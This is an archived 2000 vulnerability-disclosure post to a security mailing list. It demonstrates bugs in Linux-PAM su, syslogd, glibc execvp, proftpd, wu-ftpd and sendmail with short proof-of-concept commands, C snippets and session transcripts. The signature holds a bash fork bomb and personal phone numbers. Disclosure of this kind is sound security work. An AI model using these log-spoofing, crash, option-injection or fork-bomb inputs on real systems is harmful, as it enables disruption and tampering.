=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


    Date: Вс, 23 янв 2000  15:47:39

   От: Michal Zalewski <lcamtuf@AGS.PL>

 Кому: VULN-DEV@SECURITYFOCUS.COM

 Тема: bruterh.sh & syslogd & [g]libc & proftpd & wu-ftpd & sendmail

--------------------------------------------------------------------------------






This post describes / demonstrates bugs in:



- Linux-PAM implementation (password cracking)

- syslogd daemon (spoofing)

- glibc execvp() function (undesirable behaviour)

- proftpd (SEGV)

- wu-ftpd (passing arbitrary parameters to three external programs)

- Sendmail (junk characters in queue)



No reason to panic.



===================

1. PAM/su on RedHat

===================



Known? Dunno. But works.



RedHat - NothingInLogs[tm] BruteForce(R) Password Crack

-------------------------------------------------------

  - (c) 1999/2000, Michal Zalewski <lcamtuf@ids.pl> -



[+] Configured against user 'testy', wordfile: words

[+] Kill-delay set to 300000 usecs...

[+] Destination account is alive and well...

[+] /bin/su seems to be executable and setuid, hopefully it works...

[+] Let's go straight to number one...

[+] Wordfile 'words' loaded - 4 passwords...

[+] Estimated time: 0 secs, max: 1 secs.

[?] Trying 'testy' (3/4)...

[*] Huh, it worked. I've tried password 'testy' for 'testy'.

[+] Time wasted: 0 seconds.

[+] Thank You, and hope you enjoyed your stay.



=====================

2. syslogd / syslog()

=====================



Unix syslogd gets 'raw' log entries from o+w /dev/log socket, while date,

priority and so on are added by user-end library function, syslog(). Very,

very clever. Get command-line socket connectivity tool at

http://lcamtuf.hack.pl/pliki/uc.c, then try:



bash$ echo -ne 'XXX YY AA:BB:CC kernel - hax0red\0' | uc /dev/log

(ctrl+c)



Well-known? Hope so, anyway it's time to think about getpeeruid() or to

change permissions on syslog socket.



=======================

3. glibc - execvp() bug

=======================



glibc 2.0.x (dunno about other versions?) execvp() is buggy - first, it

tries execve() on given program in directories specified in PATH, but

then, if it gets ENOEXEC (executable format error), it tries to treat it

just like a shell script, calling /bin/sh -c filename. Might result in

strange/undesirable behaviour:



$ cat >'-c' <<EOF

anything

EOF

$ chmod 755 -- -c

$ cat >nic.c <<EOF

main() {

  execlp("-c","call_me_jane","id",0);

}

EOF

$ gcc nic.c

$ PATH=$PATH::

$ ./a.out

uid=500(lcamtuf) gid=500(lcamtuf) groups=500(lcamtuf),2(daemon),80(network)



=====================

4. proftpd / mod_ls.c

=====================



Due to missing * in modules/mod_ls.c around line 760, pointer to another

pointer is incremented, instead of incrementing referenced pointer.

Result: SEGV. Seems to be not exploitable, as this pointer to pointer is

passed as first parameter of _parse_options function, while second

parameter to this function is hard-coded 0x80, and all we have is read

fault when isblank(*0x80) is called.



Aaah, example? Quote 'LIST  X' (note: it is 'LIST(space)(space)X') while

talking to ftpd daemon on remote side.



=======================

5. wu-ftpd popen() bugs

=======================



[lcamtuf@www lcamtuf]$ ftp localhost

Connected to localhost.

220 www.XXXXX.pl FTP server (lcamtuf) ready.

Name (localhost:lcamtuf): lcamtuf

331 Password required for lcamtuf.

Password:

230 User lcamtuf logged in.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> put "smyk" "--help"

local: smyk remote: --help

200 PORT command successful.

150 Opening BINARY mode data connection for --help.

226 Transfer complete.

321 bytes sent in 0.000243 secs (1.3e+03 Kbytes/sec)

ftp> quote site checksum "--help"

200 Usage: /bin/md5sum [OPTION] [FILE]...

ftp> ls "--version"

200 PORT command successful.

150 Opening ASCII mode data connection for /bin/ls.

ls (GNU fileutils) 3.16

226 Transfer complete.



..unfortunately, /bin/md5sum, /bin/cksum nor /bin/ls haven't any

interesting options (like: 'use external program X', or 'dump output to

file X'), and I can't see any overflows/bugs in it.



Btw. 'quote site checksum existing_file' on RedHat machines causes ftpd

daemon to hang, because there's no md5sum/cksum in /bin (but in /usr/bin

instead).



6. Sendmail and non-ascii characters in queue.



Simply, try it:



-- queue_boo.c --

main() {

  printf("Type '.', then 'mailq' (works with TERM=linux).\n");

  execl("/usr/sbin/sendmail",

        "sendmail",

        "-O",

        "DeliveryMode=d",

        "lp(\033[2J\033[0H\033[1m* 0WNED BOX *\033[0;30m)",

        0);

}

-- EOF --



Stupid.



_______________________________________________________________________

Michal Zalewski * [lcamtuf@ags.pl] <> [AGS WAN] * [dione.ids.pl SYSADM]

[Marchew Industries] ! [http://lcamtuf.na.export.pl] bash$ :(){ :|:&};:

[voice phone: +48 22 813 25 86] <=-=> [cellular phone: +48 603 110 160]

Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]